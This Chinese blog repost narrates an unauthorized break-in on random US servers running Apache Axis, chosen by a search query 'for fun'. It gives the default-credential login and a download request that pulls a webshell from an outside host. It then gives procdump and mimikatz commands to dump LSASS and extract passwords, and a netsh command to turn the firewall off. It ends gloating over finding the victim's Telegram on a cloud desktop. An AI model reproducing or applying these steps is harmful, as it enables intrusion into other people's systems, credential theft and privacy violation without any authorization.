绕过杀软拿下目标站 - newlifes

admin 2021年12月31日14:50:04评论79 views字数 972阅读3分14秒阅读模式

摸鱼

日常摸鱼,无聊,想搞几台机器玩一玩,在网上找目标,找老外的机器下手

目标

country="US" && app="APACHE-Axis"

从老洞捡些漏网之鱼,没准还会有意外收获

目标出现

还是熟悉的页面,熟悉的端口

然后尝试默认口令登录,ok, 这下稳了

先搜集一下信息

不要上来就部署包,先看一下现有的服务,像这种弱口令的基本上99.9999%都已经被人搞过了

再上传包就多此一举了,可以直接利用

找了一圈没发现遗留的马儿

找绝对路径自己上传

C:/elocker/webapps/admin/WEB-INF/classes

顺手一测,竟然可以出网,也不需要传shell了,直接掏出cs

执行命令

看结果失败了

反弹shell

难道是因为在url里执行,导致powershell命令没有执行成功吗?

带着这个疑问 反弹shell尝试一下

结果还是失败,可以确定,应该是有waf

写入shell

x.x.x.x:8080/services/config/download?url=http://x.x.x.x/dama.txt&path=C:\elocker\webapps\admin\axis2-web\shell.jsp

查看一下进程

通过对比发现某安全卫士

绕过杀软

通过测试发现,最基本的net user也执行不了

摆在面前的路只有2条

  • 做免杀
  • 抓密码

果断选择抓密码,简单有效。

mimikatz不免杀不可直接用

这里我利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码

上传 procdump64.exe 并下载lsass.dmp

再在本地解析文件

procdump64.exe -accepteula -ma lsass.exe lsass.dmp
# 导出为lsass.dump文件
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
# 把lsass.dmp放在mimikatz目录利用

得到hash,破解密码

登录服务器

查看防火墙状态

Netsh Advfirewall show allprofiles

关闭防火墙

NetSh Advfirewall set allprofiles state off

内网IP,需搭建代理

登录云桌面,发现意外惊喜

发现机主运行了 telegram,嘿嘿

BY:先知论坛

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日14:50:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绕过杀软拿下目标站 - newlifeshttp://cn-sec.com/archives/709829.html

发表评论

匿名网友 填写信息